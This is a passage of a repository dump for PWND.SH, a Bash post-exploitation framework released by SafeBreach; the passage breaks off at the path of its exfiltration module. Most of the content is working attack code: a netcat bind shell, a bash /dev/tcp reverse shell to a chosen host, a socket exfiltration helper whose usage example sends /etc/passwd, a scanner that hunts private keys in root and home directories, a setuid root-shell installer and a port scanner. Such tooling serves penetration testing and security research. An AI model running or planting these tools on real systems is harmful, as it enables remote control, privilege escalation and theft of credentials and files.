[
  {
    "path": "LICENSE",
    "content": "Copyright (c) 2016, SafeBreach\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.\n\n3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
  },
  {
    "path": "README.rst",
    "content": "PWND.SH\n=======\n\npwnd.sh is a post-exploitation framework (and an interactive shell) written in Bash. It aims to be cross-platform (Linux, Mac OS X, Solaris, etc.) and to have little to no external dependencies.\n\nSlides from SkyDogCon 2016 are `available here <http://www.ikotler.org/JustGotPWND.pdf>`_\n\n\nInstall:\n--------\n\n.. code::\n\n  $ cd bin/\n  $ ./compile_pwnd_sh.sh\n\nThis will generate a file called ``pwnd.sh``.\n\n.. code::\n\n  $ ls -la pwnd.sh\n  -rw-r--r--@ 1 ikotler  staff  7823 Oct 19 16:55 pwnd.sh\n\nNow let's get pwnd!\n\n.. code::\n\n  $ source pwnd.sh\n  Pwnd v1.0.0, Itzik Kotler (@itzikkotler)]\n  Type `help' to display all the pwnd commands.\n  Type `help name' to find out more about the pwnd command `name'.\n\n  (pwnd)$\n\nSourcing the file defines the pwnd commands as functions in the current shell session, shadows the ``help`` builtin (use ``bash_help`` to reach the original) and prefixes the prompt with ``(pwnd)``.\n\nTested:\n-------\n\n* Mac OS X El Capitan (10.11.3) using GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin15)\n* Ubuntu 14.04.3 LTS using GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)\n* Oracle Solaris 11.3 X86 using GNU bash, version 4.1.17(1)-release (i386-pc-solaris2.11)\n\nFeatures/Bugs:\n--------------\n\nFound a bug? Have a good idea for improving PWND.SH? Head over to `PWND.SH's GitHub <https://github.com/safebreach-labs/pwndsh>`_ page and create a new ticket or fork. If you want to contact us, please email: labs (at) safebreach (dot) com.\n\nLicense:\n--------\n\nBSD 3-Clause\n"
  },
  {
    "path": "bin/compile_pwnd_sh.sh",
    "content": "#!/usr/bin/env bash\n\n###########################################################################\n#                                                                         #\n# Copyright (c) 2016, SafeBreach                                          #\n# All rights reserved.                                                    #\n#                                                                         #\n# Redistribution and use in source and binary forms, with or without      #\n# modification, are permitted provided that the following conditions are  #\n# met:                                                                    #\n#                                                                         #\n#  1. Redistributions of source code must retain the above                #\n# copyright notice, this list of conditions and the following             #\n# disclaimer.                                                             #\n#                                                                         #\n#  2. Redistributions in binary form must reproduce the                   #\n# above copyright notice, this list of conditions and the following       #\n# disclaimer in the documentation and/or other materials provided with    #\n# the distribution.                                                       #\n#                                                                         #\n#  3. Neither the name of the copyright holder                            #\n# nor the names of its contributors may be used to endorse or promote     #\n# products derived from this software without specific prior written      #\n# permission.                                                             
#\n#                                                                         #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS                      #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,         #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF                #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.    #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR    #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL  #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE       #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS           #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER    #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR         #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF  #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.                              #\n#                                                                         #\n###########################################################################\n\n##########\n# Consts #\n##########\n\nDEFAULT_OUTPUT_FILENAME=\"pwnd.sh\"\n\n\n#############\n# Functions #\n#############\n\nnormalize_and_append() {\n\tgrep -v \"^#\" < \"$1\" >> \"$2\"\n\techo \" \" >> \"$2\"\n}\n\n\n###############\n# Entry Point #\n###############\n\noutput_filename=\"$DEFAULT_OUTPUT_FILENAME\"\n\nif [ ! -z \"${1-}\" ]; then\n  output_filename=\"$1\"\nfi\n\n# Start with a shebang line\necho \"#!/usr/bin/env bash\"> \"$output_filename\"\n\nnormalize_and_append \"../pwnd/_pwnd.bash\" \"$output_filename\"\n\nfor module in $(find ../pwnd -type f -name \"[a-zA-Z0-9]*.bash\"); do\n  normalize_and_append \"$module\" \"$output_filename\"\ndone\n\nnormalize_and_append \"../pwnd/_bootstrap.bash\" \"$output_filename\"\n\nls -la \"$output_filename\"\n"
  },
  {
    "path": "bin/pwnd.sh",
    "content": "#!/usr/bin/env bash\n\nIFS=$' \\t\\n'\n\n\nPWND_VERSION=\"1.0.0\"\n\n\n\n_pwnd_commands=()\n\n\n\npwnd_register_cmd() {\n\t_pwnd_commands+=(\"$1;$2\")\n}\n\n\npwnd_isroot() {\n  local retval=0\n  if [ $EUID -ne 0 ]; then\n    echo \"You must be a root user\"\n    retval=1\n  fi\n  return $retval\n}\n \n\n\n__hunt_privkeys_usage() {\n  cat << \"EOF\"\nusage: __hunt_privkeys [dir ...]\n    Find all private keys that are textaully encoded. Each DIR argument will be\n    recursively searched. Default directories are: `~root' and `dirname $HOME'\nEOF\n  return 0\n}\n\n\nhunt_privkeys() {\n\n  local dirs\n\n  if [ $# -eq 0 ]; then\n    dirs=(~root \"$(dirname $HOME)\")\n  else\n    dirs=(\"$@\")\n  fi\n\n  for directory in \"${dirs[@]}\"; do\n    echo \"Scanning $directory ...\"\n    grep -ril \"PRIVATE KEY\" \"$directory\" 2> /dev/null\n  done\n\n  echo \"Done!\"\n\n}\n\npwnd_register_cmd hunt_privkeys \"Find all private keys that are textually encoded\"\n \n\n\n__bindshell_usage() {\n  cat << \"EOF\"\nusage: bindshell port [arg ...]\n    A simple yet \"cross platform\" implementation of bindshell using nc, mkfifo\n    and bash. PORT is a TCP (by default) port number. Each ARG will be passed\n    directly to nc\nEOF\n  return 0\n}\n\n\nbindshell() {\n  if [ -z \"${1-}\" ]; then\n  \t __bindshell_usage\n     return 0\n  fi\n\n  local tempfile=$(mktemp -u)\n  local port=\"$1\"\n  mkfifo \"$tempfile\"\n  bash -i 2>&1 < \"$tempfile\" | nc \"${@:2}\" -l \"$port\" > \"$tempfile\"\n}\n\npwnd_register_cmd bindshell \"A simple yet \\\"cross platform\\\" implementation of bindshell using nc, mkfifo and bash\"\n \n\n\n__reverseshell_usage() {\n  cat << \"EOF\"\nusage: reverseshell [-u] host port\n    A simple yet \"cross platform\" implementation of reverseshell using bash\n    sockets. HOST can be IPv4 address or hostname. PORT is a TCP (by default)\n    port number. 
The `-u' if specified says use UDP instead of the default option\n    of TCP.\nEOF\n  return 0\n}\n\n\nreverseshell() {\n  local host proto port\n\n  if [ \"${1-}\" == \"-u\" ]; then\n    if [ -z \"${3-}\" ]; then\n  \t   __reverseshell_usage\n       return 0\n    fi\n    host=\"$2\"\n    proto=\"udp\"\n    port=\"$3\"\n  else\n    if [ -z \"${2-}\" ]; then\n       __reverseshell_usage\n       return 0\n    fi\n    proto=\"tcp\"\n    port=\"$2\"\n    host=\"$1\"\n  fi\n\n  bash -i >& \"/dev/$proto/$host/$port\" 0>&1\n}\n\npwnd_register_cmd reverseshell \"A simple yet \\\"cross platform\\\" implementation of reverseshell using bash sockets\"\n \n\n\n__over_socket_usage() {\n  cat << \"EOF\"\nusage: over_socket [-u] host port\n    A simple yet \"cross platform\" implementation of generic TCP and UDP socket\n    using bash sockets. HOST can be IPv4 address or hostname. PORT is a TCP\n    (by default) port number. The `-u' if specified says use UDP instead of\n    the default option of TCP.\n\n    Example:\n\n    $ cat /etc/passwd | over_socket localhost 80\n\n      This will open connection to localhost at port 80 TCP and will send over\n      the content of `/etc/passwd'\nEOF\n  return 0\n}\n\n\nover_socket() {\n  local host proto port\n\n  if [ \"${1-}\" == \"-u\" ]; then\n    if [ -z \"${3-}\" ]; then\n  \t   __over_socket_usage\n       return 0\n    fi\n    host=\"$2\"\n    proto=\"udp\"\n    port=\"$3\"\n  else\n    if [ -z \"${2-}\" ]; then\n       __over_socket_usage\n       return 0\n    fi\n    proto=\"tcp\"\n    port=\"$2\"\n    host=\"$1\"\n  fi\n\n  cat /dev/stdin > \"/dev/$proto/$host/$port\"\n}\n\npwnd_register_cmd over_socket \"A simple yet \\\"cross platform\\\" implementation of generic TCP and UDP socket using bash sockets\"\n \n\n\n__install_rootshell_usage() {\n  cat << \"EOF\"\nusage: install_rootshell [/path/to/shell] [/path/to/rootshell]\n    A simple yet \"cross platform\" implementation of rootshell using chmod and\n    bash. 
/PATH/TO/SHELL is a path to shell (default: $SHELL). /PATH/TO/ROOTSHELL\n    is path to where to install the rootshell (default: mktemp -u)\nEOF\n  return 0\n}\n\n\ninstall_rootshell() {\n  pwnd_isroot || return 1\n\n  local shellfile=${1-$SHELL}\n  local rootshell=${2-$(mktemp -u)}\n\n  cp \"$shellfile\" \"$rootshell\"\n  chmod u+s \"$rootshell\"\n  ls -la \"$rootshell\"\n}\n\npwnd_register_cmd install_rootshell \"A simple yet \\\"cross platform\\\" implementation of rootshell using \\`chmod u+s' and bash\"\n \n\n\n__portscanner_usage() {\n  cat << \"EOF\"\nusage: portscanner host [port/proto ...], [port-range/proto ...]>\n    A simple yet \"cross platform\" implementation of portscanner using bash\n    sockets. HOST can be IPv4 address or hostname. PORT can be any port number.\n    PROTO can be `tcp' or `udp'. PORTS is comma-seperated PORTs. PORT-RANGE is\n    any range between 1 to 65535 following `/tcp' or `/udp' postfix.\n\n    Examples:\n\n      $ portscanner localhost 80/tcp\n\n        This will check if TCP port 80 is open on localhost.\n\n      $ portscanner localhost 53/tcp,53/udp\n\n        This will check if TCP port 53 and UDP port 53 are opened on localhost.\n\n      $ portscanner localhost 1-1024/tcp,69/udp\n\n        This will check if TCP ports 1 to 1024 are opened and if UDP port 69\n        is opened on localhost.\nEOF\n  return 0\n}\n\n\n__portscanner_timeout() {\n  # Based on: http://stackoverflow.com/questions/601543/command-line-command-to-auto-kill-a-command-after-a-certain-amount-of-time\n  `perl -e 'alarm shift; open STDERR, \"> /dev/null\"; exec @ARGV' \"$@\"`\n  # `` works better than $() in Linux when it comes to supressing 'Alarm' message _AND_ still having alarm terminating the process\n}\n\n\nportscanner() {\n  if [ -z \"${2-}\" ]; then\n    __portscanner_usage\n    return\n  fi\n\n  local host=\"$1\"\n  local ports=()\n  local csv_args=()\n\n  IFS=',' read -ra csv_args <<< \"${@:2}\"\n\n  for arg in \"${csv_args[@]}\"; do\n    case 
\"$arg\" in\n      *-*)\n        # i.e. 1-1024/tc\n        local range_ports=()\n        IFS='/' read -ra range_ports <<< \"$arg\"\n        IFS='-' read start end <<< \"${range_ports[0]}\"\n        for ((port=start; port <= end; port++)); do\n          ports+=(\"$port/${range_ports[1]}\")\n        done\n        ;;\n      *,*)\n        # i.e. '53/tcp, 53/udp'\n        IFS=',' read -ra ports <<< \"$arg\"\n        ;;\n      *)\n        # i.e. '80/tcp'\n        ports+=(\"$arg\")\n        ;;\n    esac\n  done\n\n  for port in \"${ports[@]}\"; do\n    local conn_parameter=()\n    IFS='/' read -ra conn_parameter <<< \"$port\"\n    __portscanner_timeout 1 \"echo >/dev/${conn_parameter[1]}/$host/${conn_parameter[0]}\" &&\n    echo \"port $port is open\" ||\n    echo \"port $port is closed\"\n  done\n\n}\n\npwnd_register_cmd portscanner \"A simple yet \\\"cross platform\\\" implementation of TCP and UDP port scanner using bash sockets\"\n \n\n\n__bash_help_usage() {\n  echo \"Execute bash builtin help and pass any argument to it\"\n}\n\n\nbash_help() {\n  local help_topic=\"\"\n\n  if [ ! -z \"${1-}\" ]; then\n    help_topic=\"$1\"\n  fi\n\n  bash -c \"help $help_topic\"\n}\n\n\n__help_usage() {\n  cat << \"EOF\"\nusage: pwnd-help <name>\n    Display helpful information about pwnd commands. If NAME is specified,\n    gives detailed help on command NAME, otherwise a list of the pwnd commands\n    is printed.\n\n    To access bash builtin help use: `bash_help'\nEOF\n\n  return 0\n}\n\n\nhelp() {\n  if [ ! -z \"${1-}\" ]; then\n    eval \"__$1_usage\" 2> /dev/null\n    if [ $? == 127 ]; then\n\t    echo \"pwnd-help: no help topics match \\`$1'. Try \\`help' to see all the defined commands\"\n\t    return 127\n\t  fi\n  else\n    cat << EOF\npwnd, version ${PWND_VERSION} (${MACHTYPE})\nThese pwnd commands are defined internally. 
Type \\`help' to see this list.\nType \\`help name' to find out more about the pwnd command \\`name'.\n\nEOF\n    for pwnd_command in \"${_pwnd_commands[@]-}\"; do\n      IFS=';' read -ra pwnd_cmd_parameters <<< \"$pwnd_command\"\n      # IFS=';' pwnd_cmd_parameters=($pwnd_command)\n      printf \"%-19s -- %s\\n\" \"${pwnd_cmd_parameters[0]}\" \"${pwnd_cmd_parameters[1]}\"\n    done\n  fi\n}\n\n\n\ncat << EOF\n[Pwnd v${PWND_VERSION}, Itzik Kotler (@itzikkotler)]\"\nType \\`help' to display all the pwnd commands.\nType \\`help name' to find out more about the pwnd command \\`name'.\n\nEOF\n\nPS1=\"(\\[\\033[92m\\]\\[\\033[1m\\]pwnd\\[\\033[0m\\]\\[\\033[39m\\])${PS1-}\"\n \n"
  },
  {
    "path": "pwnd/_bootstrap.bash",
    "content": "###########################################################################\n#                                                                         #\n# Copyright (c) 2016, SafeBreach                                          #\n# All rights reserved.                                                    #\n#                                                                         #\n# Redistribution and use in source and binary forms, with or without      #\n# modification, are permitted provided that the following conditions are  #\n# met:                                                                    #\n#                                                                         #\n#  1. Redistributions of source code must retain the above                #\n# copyright notice, this list of conditions and the following             #\n# disclaimer.                                                             #\n#                                                                         #\n#  2. Redistributions in binary form must reproduce the                   #\n# above copyright notice, this list of conditions and the following       #\n# disclaimer in the documentation and/or other materials provided with    #\n# the distribution.                                                       #\n#                                                                         #\n#  3. Neither the name of the copyright holder                            #\n# nor the names of its contributors may be used to endorse or promote     #\n# products derived from this software without specific prior written      #\n# permission.                                                             
#\n#                                                                         #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS                      #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,         #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF                #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.    #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR    #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL  #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE       #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS           #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER    #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR         #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF  #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.                              #\n#                                                                         #\n###########################################################################\n\n# _bootstrap.sh, interactive pwnd shell\n\n__bash_help_usage() {\n  echo \"Execute bash builtin help and pass any argument to it\"\n}\n\n\nbash_help() {\n  local help_topic=\"\"\n\n  if [ ! -z \"${1-}\" ]; then\n    help_topic=\"$1\"\n  fi\n\n  bash -c \"help $help_topic\"\n}\n\n\n__help_usage() {\n  cat << \"EOF\"\nusage: pwnd-help <name>\n    Display helpful information about pwnd commands. If NAME is specified,\n    gives detailed help on command NAME, otherwise a list of the pwnd commands\n    is printed.\n\n    To access bash builtin help use: `bash_help'\nEOF\n\n  return 0\n}\n\n\nhelp() {\n  if [ ! -z \"${1-}\" ]; then\n    eval \"__$1_usage\" 2> /dev/null\n    if [ $? == 127 ]; then\n\t    echo \"pwnd-help: no help topics match \\`$1'. 
Try \\`help' to see all the defined commands\"\n\t    return 127\n\t  fi\n  else\n    cat << EOF\npwnd, version ${PWND_VERSION} (${MACHTYPE})\nThese pwnd commands are defined internally. Type \\`help' to see this list.\nType \\`help name' to find out more about the pwnd command \\`name'.\n\nEOF\n    for pwnd_command in \"${_pwnd_commands[@]-}\"; do\n      IFS=';' read -ra pwnd_cmd_parameters <<< \"$pwnd_command\"\n      # IFS=';' pwnd_cmd_parameters=($pwnd_command)\n      printf \"%-19s -- %s\\n\" \"${pwnd_cmd_parameters[0]}\" \"${pwnd_cmd_parameters[1]}\"\n    done\n  fi\n}\n\n\n###############\n# Entry Point #\n###############\n\ncat << EOF\n[Pwnd v${PWND_VERSION}, Itzik Kotler (@itzikkotler)]\"\nType \\`help' to display all the pwnd commands.\nType \\`help name' to find out more about the pwnd command \\`name'.\n\nEOF\n\nPS1=\"(\\[\\033[92m\\]\\[\\033[1m\\]pwnd\\[\\033[0m\\]\\[\\033[39m\\])${PS1-}\"\n"
  },
  {
    "path": "pwnd/_pwnd.bash",
    "content": "###########################################################################\n#                                                                         #\n# Copyright (c) 2016, SafeBreach                                          #\n# All rights reserved.                                                    #\n#                                                                         #\n# Redistribution and use in source and binary forms, with or without      #\n# modification, are permitted provided that the following conditions are  #\n# met:                                                                    #\n#                                                                         #\n#  1. Redistributions of source code must retain the above                #\n# copyright notice, this list of conditions and the following             #\n# disclaimer.                                                             #\n#                                                                         #\n#  2. Redistributions in binary form must reproduce the                   #\n# above copyright notice, this list of conditions and the following       #\n# disclaimer in the documentation and/or other materials provided with    #\n# the distribution.                                                       #\n#                                                                         #\n#  3. Neither the name of the copyright holder                            #\n# nor the names of its contributors may be used to endorse or promote     #\n# products derived from this software without specific prior written      #\n# permission.                                                             
#\n#                                                                         #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS                      #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,         #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF                #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.    #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR    #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL  #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE       #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS           #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER    #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR         #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF  #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.                              #\n#                                                                         #\n###########################################################################\n\nIFS=$' \\t\\n'\n\n##########\n# Consts #\n##########\n\nPWND_VERSION=\"1.0.0\"\n\n\n####################\n# Global variables #\n####################\n\n_pwnd_commands=()\n\n\n#############\n# Functions #\n#############\n\npwnd_register_cmd() {\n\t_pwnd_commands+=(\"$1;$2\")\n}\n\n\npwnd_isroot() {\n  local retval=0\n  if [ $EUID -ne 0 ]; then\n    echo \"You must be a root user\"\n    retval=1\n  fi\n  return $retval\n}\n"
  },
  {
    "path": "pwnd/assets/priv_keys.bash",
    "content": "###########################################################################\n#                                                                         #\n# Copyright (c) 2016, SafeBreach                                          #\n# All rights reserved.                                                    #\n#                                                                         #\n# Redistribution and use in source and binary forms, with or without      #\n# modification, are permitted provided that the following conditions are  #\n# met:                                                                    #\n#                                                                         #\n#  1. Redistributions of source code must retain the above                #\n# copyright notice, this list of conditions and the following             #\n# disclaimer.                                                             #\n#                                                                         #\n#  2. Redistributions in binary form must reproduce the                   #\n# above copyright notice, this list of conditions and the following       #\n# disclaimer in the documentation and/or other materials provided with    #\n# the distribution.                                                       #\n#                                                                         #\n#  3. Neither the name of the copyright holder                            #\n# nor the names of its contributors may be used to endorse or promote     #\n# products derived from this software without specific prior written      #\n# permission.                                                             
#\n#                                                                         #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS                      #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,         #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF                #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.    #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR    #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL  #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE       #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS           #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER    #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR         #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF  #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.                              #\n#                                                                         #\n###########################################################################\n\n# priv_keys, Find all private keys that are textually encoded\n\n__hunt_privkeys_usage() {\n  cat << \"EOF\"\nusage: __hunt_privkeys [dir ...]\n    Find all private keys that are textaully encoded. Each DIR argument will be\n    recursively searched. Default directories are: `~root' and `dirname $HOME'\nEOF\n  return 0\n}\n\n\nhunt_privkeys() {\n\n  local dirs\n\n  if [ $# -eq 0 ]; then\n    dirs=(~root \"$(dirname $HOME)\")\n  else\n    dirs=(\"$@\")\n  fi\n\n  for directory in \"${dirs[@]}\"; do\n    echo \"Scanning $directory ...\"\n    grep -ril \"PRIVATE KEY\" \"$directory\" 2> /dev/null\n  done\n\n  echo \"Done!\"\n\n}\n\npwnd_register_cmd hunt_privkeys \"Find all private keys that are textually encoded\"\n"
  },
  {
    "path": "pwnd/c2/bindshell.bash",
    "content": "###########################################################################\n#                                                                         #\n# Copyright (c) 2016, SafeBreach                                          #\n# All rights reserved.                                                    #\n#                                                                         #\n# Redistribution and use in source and binary forms, with or without      #\n# modification, are permitted provided that the following conditions are  #\n# met:                                                                    #\n#                                                                         #\n#  1. Redistributions of source code must retain the above                #\n# copyright notice, this list of conditions and the following             #\n# disclaimer.                                                             #\n#                                                                         #\n#  2. Redistributions in binary form must reproduce the                   #\n# above copyright notice, this list of conditions and the following       #\n# disclaimer in the documentation and/or other materials provided with    #\n# the distribution.                                                       #\n#                                                                         #\n#  3. Neither the name of the copyright holder                            #\n# nor the names of its contributors may be used to endorse or promote     #\n# products derived from this software without specific prior written      #\n# permission.                                                             
#\n#                                                                         #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS                      #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,         #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF                #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.    #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR    #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL  #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE       #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS           #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER    #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR         #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF  #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.                              #\n#                                                                         #\n###########################################################################\n\n# bindshell, A simple yet \"cross platform\" implementation of bindshell using nc, mkfifo and /bin/bash\n\n__bindshell_usage() {\n  cat << \"EOF\"\nusage: bindshell port [arg ...]\n    A simple yet \"cross platform\" implementation of bindshell using nc, mkfifo\n    and bash. PORT is a TCP (by default) port number. Each ARG will be passed\n    directly to nc\nEOF\n  return 0\n}\n\n\nbindshell() {\n  if [ -z \"${1-}\" ]; then\n  \t __bindshell_usage\n     return 0\n  fi\n\n  local tempfile=$(mktemp -u)\n  local port=\"$1\"\n  mkfifo \"$tempfile\"\n  bash -i 2>&1 < \"$tempfile\" | nc \"${@:2}\" -l \"$port\" > \"$tempfile\"\n}\n\npwnd_register_cmd bindshell \"A simple yet \\\"cross platform\\\" implementation of bindshell using nc, mkfifo and bash\"\n"
  },
  {
    "path": "pwnd/c2/reverseshell.bash",
    "content": "###########################################################################\n#                                                                         #\n# Copyright (c) 2016, SafeBreach                                          #\n# All rights reserved.                                                    #\n#                                                                         #\n# Redistribution and use in source and binary forms, with or without      #\n# modification, are permitted provided that the following conditions are  #\n# met:                                                                    #\n#                                                                         #\n#  1. Redistributions of source code must retain the above                #\n# copyright notice, this list of conditions and the following             #\n# disclaimer.                                                             #\n#                                                                         #\n#  2. Redistributions in binary form must reproduce the                   #\n# above copyright notice, this list of conditions and the following       #\n# disclaimer in the documentation and/or other materials provided with    #\n# the distribution.                                                       #\n#                                                                         #\n#  3. Neither the name of the copyright holder                            #\n# nor the names of its contributors may be used to endorse or promote     #\n# products derived from this software without specific prior written      #\n# permission.                                                             
#\n#                                                                         #\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS                      #\n# AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,         #\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF                #\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.    #\n# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR    #\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL  #\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE       #\n# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS           #\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER    #\n# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR         #\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF  #\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.                              #\n#                                                                         #\n###########################################################################\n\n# reverseshell, A simple yet \"cross platform\" implementation of reverseshell using bash sockets\n\n__reverseshell_usage() {\n  cat << \"EOF\"\nusage: reverseshell [-u] host port\n    A simple yet \"cross platform\" implementation of reverseshell using bash\n    sockets. HOST can be IPv4 address or hostname. PORT is a TCP (by default)\n    port number. 
The `-u' if specified says use UDP instead of the default option\n    of TCP.\nEOF\n  return 0\n}\n\n\nreverseshell() {\n  local host proto port\n\n  if [ \"${1-}\" == \"-u\" ]; then\n    if [ -z \"${3-}\" ]; then\n  \t   __reverseshell_usage\n       return 0\n    fi\n    host=\"$2\"\n    proto=\"udp\"\n    port=\"$3\"\n  else\n    if [ -z \"${2-}\" ]; then\n       __reverseshell_usage\n       return 0\n    fi\n    proto=\"tcp\"\n    port=\"$2\"\n    host=\"$1\"\n  fi\n\n  bash -i >& \"/dev/$proto/$host/$port\" 0>&1\n}\n\npwnd_register_cmd reverseshell \"A simple yet \\\"cross platform\\\" implementation of reverseshell using bash sockets\"\n"
  },
  {
    "path": "pwnd/exfiltration/over_socket.bash",
